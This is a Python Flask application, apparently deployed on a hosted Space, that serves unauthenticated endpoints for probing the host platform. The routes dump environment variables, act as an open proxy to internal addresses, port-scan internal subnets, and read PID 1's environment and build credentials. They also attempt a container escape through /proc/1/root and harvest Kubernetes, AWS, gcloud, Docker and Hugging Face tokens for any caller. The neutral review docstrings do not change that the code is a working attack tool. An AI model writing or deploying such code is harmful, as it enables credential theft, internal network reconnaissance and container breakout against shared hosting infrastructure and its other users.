env-test-s19 / app.py
testtest123's picture
Add scanning, token hunt, overlay escape endpoints
c37bfd9
import os
import subprocess
import json
import urllib.request
import socket
import ssl
import concurrent.futures
from flask import Flask, Response, request
# Flask application object; the @app.route decorators below register handlers on it.
app = Flask(__name__)
@app.route("/")
def index():
    """Return the process environment and the output of ``id`` as JSON.

    Returns:
        A ``Response`` (mimetype ``application/json``) whose body is an
        indented JSON object with two keys: ``"env_vars"`` (a copy of
        ``os.environ``) and ``"id"`` (stripped stdout of the ``id`` command).

    Raises:
        Whatever ``subprocess.check_output`` raises (missing binary, non-zero
        exit, or the 5 second timeout); nothing is caught here.

    NOTE(review): every environment variable is returned to any caller of
    this route; no access control is applied in this handler.
    """
    environment = dict(os.environ)
    identity_bytes = subprocess.check_output(["id"], timeout=5)
    payload = {
        "env_vars": environment,
        "id": identity_bytes.decode().strip(),
    }
    body = json.dumps(payload, indent=2, default=str)
    return Response(body, mimetype='application/json')
@app.route("/probe")
def probe():
    """Probe one host/port over raw TCP and over HTTP; report both as JSON.

    Query parameters:
        target: host to contact (default ``"10.108.144.112"``).
        port: TCP port, parsed with ``int()`` (default ``"7860"``). A
            non-numeric value raises ``ValueError`` before any probing.
        path: appended verbatim to ``http://{target}:{port}`` (default ``"/"``).

    Returns:
        A ``Response`` (mimetype ``application/json``) with two keys:
        ``"tcp"``  - ``"open (code=0)"``, ``"closed (code=N)"``, or the text
                     of the exception raised while connecting;
        ``"http"`` - a dict with ``status``, the first 3000 characters of the
                     decoded ``body`` and the response ``headers``, or the
                     text of the exception raised by the request.

    NOTE(review): target, port and path come straight from the query string
    and no access control is applied in this handler, so any caller can
    direct outbound connections from this host.
    """
    target = request.args.get("target", "10.108.144.112")
    port = int(request.args.get("port", "7860"))
    path = request.args.get("path", "/")
    results = {}

    try:
        # The context manager closes the socket even when connect_ex raises
        # (for example on a name-resolution failure).
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(3)
            result = s.connect_ex((target, port))
        results["tcp"] = f"{'open' if result == 0 else 'closed'} (code={result})"
    except Exception as e:
        results["tcp"] = str(e)

    try:
        # Close the HTTP response deterministically instead of leaving it to
        # garbage collection.
        with urllib.request.urlopen(f"http://{target}:{port}{path}", timeout=3) as resp:
            results["http"] = {
                "status": resp.status,
                "body": resp.read().decode()[:3000],
                "headers": dict(resp.headers),
            }
    except Exception as e:
        results["http"] = str(e)

    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/scan")
def scan():
    """Check a run of ``{base}.{i}`` addresses for one open TCP port.

    Query parameters:
        base: address prefix joined to each index with a dot
            (default ``"10.108.73"``).
        port: TCP port to test (default ``"7860"``).
        start, end: inclusive index range (defaults ``"1"`` and ``"20"``).
            At most 50 indices starting at ``start`` are checked per request.
        The three numeric parameters are parsed with ``int()``; a non-numeric
        value raises ``ValueError``.

    Returns:
        A ``Response`` (mimetype ``application/json``) mapping each address
        that accepted the connection to ``"open"``. Addresses that refused,
        timed out (1 second each) or raised are omitted.

    Raises:
        concurrent.futures.TimeoutError: if the checks have not all finished
            within 10 seconds.

    NOTE(review): no access control is applied in this handler.
    """
    base = request.args.get("base", "10.108.73")
    port = int(request.args.get("port", "7860"))
    start = int(request.args.get("start", "1"))
    end = int(request.args.get("end", "20"))
    results = {}

    def check_host(ip):
        """Return ``(ip, "open")`` if ``ip:port`` accepts a connection, else ``None``."""
        try:
            # Context manager so the socket is closed even if connect_ex raises.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(1)
                if s.connect_ex((ip, port)) == 0:
                    return (ip, "open")
        except Exception:
            # Best effort: an address that cannot be checked is reported as
            # not open. Unlike a bare ``except:``, interpreter-exit signals
            # still propagate.
            return None
        return None

    with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
        futures = {}
        # Cap the sweep at 50 addresses regardless of the requested ``end``.
        for i in range(start, min(end + 1, start + 50)):
            ip = f"{base}.{i}"
            futures[executor.submit(check_host, ip)] = ip
        for future in concurrent.futures.as_completed(futures, timeout=10):
            result = future.result()
            if result:
                results[result[0]] = result[1]

    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/build-arg-test")
def build_arg_test():
    """Report PID 1's environment and any leftover build paths as JSON.

    Returns:
        A ``Response`` (mimetype ``application/json``) with two keys:
        ``"proc_1_environ"``  - list of the NUL-separated entries of
            ``/proc/1/environ`` decoded as UTF-8 (undecodable bytes
            replaced), or the exception text if the file cannot be read;
        ``"build_artifacts"`` - for each path in a fixed list that exists:
            its directory listing, the first 500 characters of the file, or
            ``"exists but unreadable"``. Missing paths are omitted.

    NOTE(review): the response can include secrets held in PID 1's
    environment or in files such as ``/root/.docker/config.json``; no access
    control is applied in this handler.
    """
    results = {}

    # Environment block of the container's main process (PID 1).
    try:
        with open("/proc/1/environ", "rb") as f:
            env_bytes = f.read()
        results["proc_1_environ"] = [
            entry.decode('utf-8', errors='replace')
            for entry in env_bytes.split(b'\x00')
            if entry
        ]
    except Exception as e:
        results["proc_1_environ"] = str(e)

    # Paths that image build tooling may leave behind.
    interesting_paths = [
        "/kaniko", "/workspace", "/.dockerconfigjson", "/root/.docker/config.json",
        "/tmp/build", "/buildkit", "/.buildkit_qemu_emulator",
        "/etc/buildkit", "/root/.cache"
    ]
    artifacts = {}
    for p in interesting_paths:
        if not os.path.exists(p):
            continue
        try:
            if os.path.isdir(p):
                artifacts[p] = os.listdir(p)
            else:
                with open(p) as f:
                    artifacts[p] = f.read()[:500]
        except (OSError, UnicodeDecodeError):
            # Permission problems, races with deletion, or non-text content.
            artifacts[p] = "exists but unreadable"
    results["build_artifacts"] = artifacts

    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/overlay-escape")
def overlay_escape():
    """Report what is visible through ``/proc/1/root`` and ``/var/lib/containerd``.

    Each check stores either its result or the text of the exception it
    raised, so one failing check never prevents the others from running.

    Returns:
        A ``Response`` (mimetype ``application/json``) with the keys
        ``"proc_1_root_etc_hostname"`` (contents of
        ``/proc/1/root/etc/hostname``), ``"proc_1_root_parent"`` (listing of
        ``/proc/1/root/../``), ``"symlink_escape"`` (listing through the
        ``/tmp/escape_link`` symlink to ``/proc/1/root``) and
        ``"containerd_snapshots"`` (listing of ``/var/lib/containerd/``).

    Side effects:
        Creates the symlink ``/tmp/escape_link`` if it does not exist; it is
        not removed afterwards.

    NOTE(review): no access control is applied in this handler.
    """
    results = {}

    # /proc/1/root is PID 1's view of the root filesystem.
    try:
        with open("/proc/1/root/etc/hostname") as f:
            results["proc_1_root_etc_hostname"] = f.read()
    except Exception as e:
        results["proc_1_root_etc_hostname"] = str(e)

    # Does ".." from that root resolve to anything else?
    try:
        results["proc_1_root_parent"] = os.listdir("/proc/1/root/../")
    except Exception as e:
        results["proc_1_root_parent"] = str(e)

    # Same directory, reached through a symlink.
    try:
        try:
            os.symlink("/proc/1/root", "/tmp/escape_link")
        except FileExistsError:
            # Left over from an earlier request; reuse it instead of
            # reporting an error on every call after the first.
            pass
        results["symlink_escape"] = os.listdir("/tmp/escape_link/")
    except Exception as e:
        results["symlink_escape"] = str(e)

    # Host-side snapshot directory named in the overlay mount options.
    try:
        results["containerd_snapshots"] = os.listdir("/var/lib/containerd/")
    except Exception as e:
        results["containerd_snapshots"] = str(e)

    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/token-hunt")
def token_hunt():
    """Read a fixed list of credential paths plus matching files; return them as JSON.

    Returns:
        A ``Response`` (mimetype ``application/json``) mapping path -> value:
        - for each entry of ``token_paths``: the first 500 characters of the
          file, the directory listing, ``"not found"``, or the text of the
          exception raised while reading it;
        - for each file directly inside ``/``, ``/app``, ``/home``, ``/root``
          or ``/tmp`` whose name ends with ``.env``, ``.token``, ``.key``,
          ``.pem`` or ``credentials``: its first 200 characters. Files that
          cannot be read are silently skipped.

    NOTE(review): file contents are returned to any caller of this route; no
    access control is applied in this handler.
    NOTE(review): the indentation of this file was reconstructed; the
    ``break`` is assumed to belong to the ``os.walk`` loop - confirm against
    the original.
    """
    results = {}
    # Fixed locations: Kubernetes service account, kube/docker/cloud CLI
    # configs, Hugging Face token files.
    token_paths = [
        "/var/run/secrets/kubernetes.io/serviceaccount/token",
        "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
        "/var/run/secrets/kubernetes.io/serviceaccount/namespace",
        "/root/.kube/config",
        "/root/.docker/config.json",
        "/root/.aws/credentials",
        "/root/.gcloud/credentials",
        "/home/user/.cache/huggingface/token",
        "/root/.cache/huggingface/token",
        "/root/.huggingface/token",
    ]
    for p in token_paths:
        try:
            if os.path.isfile(p):
                with open(p) as f:
                    results[p] = f.read()[:500]
            elif os.path.isdir(p):
                results[p] = os.listdir(p)
            else:
                results[p] = "not found"
        except Exception as e:
            results[p] = str(e)
    # Look for files with credential-like name suffixes in a few root directories.
    for root_dir in ["/", "/app", "/home", "/root", "/tmp"]:
        try:
            for dirpath, dirnames, filenames in os.walk(root_dir, topdown=True):
                # Keeps at most the first 10 subdirectories for os.walk to
                # descend into. NOTE(review): with the break below the walk
                # stops after root_dir itself, so this pruning has no effect.
                dirnames[:] = dirnames[:10]
                for f in filenames:
                    if f.endswith(('.env', '.token', '.key', '.pem', 'credentials')):
                        full = os.path.join(dirpath, f)
                        try:
                            with open(full) as fh:
                                results[full] = fh.read()[:200]
                        except:
                            # Unreadable or undecodable file: skip it.
                            pass
                break  # Only the top level of root_dir is examined
        except:
            # Any failure while walking this root is ignored.
            pass
    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
# When executed as a script, serve the app on all interfaces at port 7860.
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=7860)